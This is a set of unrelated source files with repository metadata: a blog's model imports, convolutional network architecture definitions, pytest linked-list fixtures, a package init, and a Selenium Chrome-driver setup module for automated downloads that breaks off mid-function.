2484d6bb327c7e0961097e174bc76f87df458c86 | 126 | py | Python | backend/app/db/base.py | ianahart/blog | fc52e15a8b56bd4c6482065de7e21f8b31f5d765 | [
"MIT"
] | null | null | null | backend/app/db/base.py | ianahart/blog | fc52e15a8b56bd4c6482065de7e21f8b31f5d765 | [
"MIT"
] | null | null | null | backend/app/db/base.py | ianahart/blog | fc52e15a8b56bd4c6482065de7e21f8b31f5d765 | [
"MIT"
] | null | null | null | from .base_class import Base
from app.models.user import User
from app.models.post import Post
from app.models.tag import Tag
| 25.2 | 32 | 0.81746 | 23 | 126 | 4.434783 | 0.391304 | 0.205882 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 4 | 33 | 31.5 | 0.927273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2496f5530f56b3d194d9dc9e1f00a515e14ba0b1 | 25,008 | py | Python | neon3/arch/emarch.py | erjel/emdrp | 0b04a164989dd2f8ab8d1defc38353a6c0c11c8c | [
"MIT"
] | 4 | 2020-01-14T14:41:14.000Z | 2022-01-08T11:12:27.000Z | neon3/arch/emarch.py | erjel/emdrp | 0b04a164989dd2f8ab8d1defc38353a6c0c11c8c | [
"MIT"
] | 1 | 2021-09-23T19:59:08.000Z | 2021-09-23T19:59:08.000Z | neon3/arch/emarch.py | erjel/emdrp | 0b04a164989dd2f8ab8d1defc38353a6c0c11c8c | [
"MIT"
] | 1 | 2021-03-02T15:25:48.000Z | 2021-03-02T15:25:48.000Z | # The MIT License (MIT)
#
# Copyright (c) 2016 Paul Watkins, National Institutes of Health / NINDS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from neon.initializers import Constant, Gaussian, Uniform, Kaiming
from neon.layers import Conv, Dropout, Pooling, Affine, LRN #, Deconv
#from neon.layers import Activation, MergeSum, SkipNode, BatchNorm
from neon.transforms import Rectlin, Logistic, Softmax, Identity, Explin
from layers.emlayers import DOG
class EMModelArchitecture(object):
def __init__(self, noutputs, use_softmax):
self.noutputs = noutputs
self.use_softmax = use_softmax
@property
def layers(self):
raise NotImplementedError()
@staticmethod
def init_model_arch(name, noutputs, use_softmax):
# instantiate the model with class given by name string
return globals()[name](noutputs, use_softmax)
class fergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(fergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
return [
Conv((7, 7, 96), init=Gaussian(scale=0.0001), bias=Constant(0), activation=Rectlin(),
padding=3, strides=1),
LRN(31, ascale=0.001, bpower=0.75),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=2, strides=1),
LRN(31, ascale=0.001, bpower=0.75),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=1, strides=1),
Conv((3, 3, 384), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=1, strides=1),
Conv((3, 3, 256), init=Gaussian(scale=0.01), bias=Constant(0), activation=Rectlin(),
padding=1, strides=1),
Pooling(3, strides=2, padding=1),
Affine(nout=4096, init=Gaussian(scale=0.01), bias=Constant(0), activation=Identity()),
Dropout(keep=0.5),
Affine(nout=4096, init=Gaussian(scale=0.01), bias=Constant(0), activation=Identity()),
Dropout(keep=0.5),
Affine(nout=self.noutputs, init=Gaussian(scale=0.01), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class nfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(nfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn,
padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(),
padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
#Pooling(3, strides=2, padding=1, op='avg'),
Pooling(3, strides=2, padding=1),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class nbfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(nbfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn,
padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(),
padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
Affine(nout=4096, init=Kaiming(), activation=Explin(), batch_norm=bn),
Dropout(keep=0.5),
Affine(nout=4096, init=Kaiming(), activation=Explin(), batch_norm=bn),
Dropout(keep=0.5),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: 9.1 s / batch, 980 test: 3 s / batch
# overall best architecture found for huge ECS; use 128 in, 3-class, 32 out
class mfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(mfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# these are mostly meant as convolution speed test cases.
class bigcfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(bigcfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((9, 9, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=4, strides=1)\
if self.bn_first_layer else\
Conv((9, 9, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=4, strides=1),
Pooling(3, strides=2, padding=1),
Conv((9, 9, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=4, strides=1),
Pooling(3, strides=2, padding=1),
Conv((7, 7, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class bigsfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(bigsfergus, self).__init__(noutputs, use_softmax)
self.bn_first_layer = bn_first_layer
@property
def layers(self):
bn = True
return [
Conv((7, 7, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1)\
if self.bn_first_layer else\
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((7, 7, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
Conv((5, 5, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
Conv((3, 3, 768), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 768), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 768), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: 4.3 s / batch, 980 test: 1.5 s / batch
class h3vgg(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(h3vgg, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 80), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1, op='avg'),
# 8
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), activation=Explin(), batch_norm=bn),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# winner for huge ECS among the 3x3-kernel archs for 64x64; use 128 in, 3-class, 64 out
class vgg3pool(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(vgg3pool, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
# this 4th deep layer may have been in for the vgg3pool64all run; it cannot fit for 6fold, so it is commented out
#Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
#Conv((3, 3, 6144), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 12288), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: xxx s / batch, 980 test: 0.65 s / batch
class vgg4pool(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(vgg4pool, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 64), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 64), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 9216), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class vgg5pool(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(vgg5pool, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 96), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 8192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
# 980 train: xxx s / batch, 980 test: 0.95 s / batch
# runner-up for huge ECS using normal kernel archs for 64x64; use 128 in, 3-class, 64 out
# same architecture as mfergus except it uses global pooling instead of fully connected layers
class pfergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(pfergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 6144), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class p2fergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(p2fergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 64), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 10240), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class p3fergus(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False, bn_first_layer=False):
super(p3fergus, self).__init__(noutputs, use_softmax)
@property
def layers(self):
bn = True
return [
# input 128
Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 8192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class cifar10(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(cifar10, self).__init__(noutputs, use_softmax)
@property
def layers(self):
init_uni = Uniform(low=-0.1, high=0.1)
bn = False
return [
Conv((5, 5, 16), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Conv((5, 5, 32), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Affine(nout=500, init=init_uni, activation=Rectlin(), batch_norm=bn),
Affine(nout=self.noutputs, init=init_uni, bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class DOG_cifar10(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(DOG_cifar10, self).__init__(noutputs, use_softmax)
@property
def layers(self):
init_uni = Uniform(low=-0.1, high=0.1)
bn = False
return [
DOG((5.0, 4.0, 3.0, 1.6), 1.8),
Conv((5, 5, 16), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Conv((5, 5, 32), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Affine(nout=500, init=init_uni, activation=Rectlin(), batch_norm=bn),
Affine(nout=self.noutputs, init=init_uni, bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
| 53.321962 | 110 | 0.605126 | 3,273 | 25,008 | 4.522456 | 0.081577 | 0.085461 | 0.072085 | 0.165991 | 0.862789 | 0.862789 | 0.854749 | 0.854749 | 0.853128 | 0.822862 | 0 | 0.059269 | 0.245042 | 25,008 | 468 | 111 | 53.435897 | 0.724735 | 0.091691 | 0 | 0.799451 | 0 | 0 | 0.00212 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090659 | false | 0 | 0.010989 | 0.005495 | 0.18956 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
564a02eb5a3a1dbba387625d46636b086ffd78da | 294 | py | Python | challenges/ll_merge/conftest.py | seattlechem/data-structures-and-algorithms | 376e465c0a5529ea7c5c4e972a9852b6340251ff | [
"MIT"
] | null | null | null | challenges/ll_merge/conftest.py | seattlechem/data-structures-and-algorithms | 376e465c0a5529ea7c5c4e972a9852b6340251ff | [
"MIT"
] | null | null | null | challenges/ll_merge/conftest.py | seattlechem/data-structures-and-algorithms | 376e465c0a5529ea7c5c4e972a9852b6340251ff | [
"MIT"
] | null | null | null | import pytest
from .linked_list import LinkedList
@pytest.fixture
def ll1():
return LinkedList([1, 4, 7])
@pytest.fixture
def ll2():
return LinkedList([2, 5, 8])
@pytest.fixture
def ll1_one():
return LinkedList([1])
@pytest.fixture
def ll2_one():
return LinkedList([2])
| 12.782609 | 35 | 0.676871 | 41 | 294 | 4.780488 | 0.439024 | 0.265306 | 0.326531 | 0.193878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.183673 | 294 | 22 | 36 | 13.363636 | 0.766667 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.142857 | 0.285714 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
56a7f32d40e31d59741ecf9369ad2d02c5094d5e | 95 | py | Python | stable_baselines3/bcq/__init__.py | mjyoo2/stable-baselines3 | ef7a580219df6d977b56fb99e503890bd5211195 | [
"MIT"
] | null | null | null | stable_baselines3/bcq/__init__.py | mjyoo2/stable-baselines3 | ef7a580219df6d977b56fb99e503890bd5211195 | [
"MIT"
] | null | null | null | stable_baselines3/bcq/__init__.py | mjyoo2/stable-baselines3 | ef7a580219df6d977b56fb99e503890bd5211195 | [
"MIT"
] | null | null | null | from stable_baselines3.bcq.policies import MlpPolicy
from stable_baselines3.bcq.bcq import BCQ
| 31.666667 | 52 | 0.873684 | 14 | 95 | 5.785714 | 0.5 | 0.246914 | 0.493827 | 0.567901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.084211 | 95 | 2 | 53 | 47.5 | 0.908046 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
8e7835a2dc6ed8cc28a424fdfc51f121d6dff0f8 | 7,683 | py | Python | default/webdriver_utilities/pre_drivers.py | SilasPDJ/autoesk | df0a7457de4795a76887f682f0515431c903ee86 | [
"MIT"
] | null | null | null | default/webdriver_utilities/pre_drivers.py | SilasPDJ/autoesk | df0a7457de4795a76887f682f0515431c903ee86 | [
"MIT"
] | 1 | 2020-09-24T20:29:05.000Z | 2021-12-24T05:00:52.000Z | default/webdriver_utilities/pre_drivers.py | SilasPDJ/autoesk | df0a7457de4795a76887f682f0515431c903ee86 | [
"MIT"
] | null | null | null | from default.webdriver_utilities import Options, webdriver
from whatsapp.dialog_profile_path import profiles_main_folder
# from default.settings.set_paths import SetPaths
# import QR code...
# the other, more complex driver lives only inside the whatsapp project
import os
volta = os.getcwd()
# TODO: keep developing real_path for the driver
link = "Chromedriver/chromedriver.exe"
def real_path_for_chromedriver():
this_file_path = os.path.realpath(__file__)
path = '\\'.join(this_file_path.split('\\')[:-1])
os.chdir(path)
def default_qrcode_driver(path=''):
"""
:param path: defaults to the current path (downloads)
:return: the driver, to be closed in the loop
# no specific profile
# new_path_set -> opens a specified download folder if it does not exist yet
"""
__padrao = profiles_main_folder()
# path = SetPaths().new_path_set(path)
# already in mamae_download
path = path.replace('/', '\\')
# the try is already handled inside replace
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
chrome_options.add_argument(f"user-data-dir={__padrao}")
# loads the default profile with the qr_code
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.default_directory": path,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": False,
'profile.default_content_setting_values.automatic_downloads': 1
})
chromedriver = link
real_path_for_chromedriver()
# taken from ginfess_driver [magic]
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
def pgdas_driver(path=''):
"""
:param path: defaults to the current path
:return: the driver, to be closed in the loop
"""
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
# profile chrome_options.add_argument("user-data-dir=C:\\Users\\AtechM_03\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 2")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.default_directory": path,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": False,
'profile.default_content_setting_values.automatic_downloads': 1
})
chromedriver = link
real_path_for_chromedriver()
# taken from ginfess_driver [magic]
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
def ginfess_driver(path=''):
"""
:param path: defaults to the current path
:return: the driver, to be closed in the loop
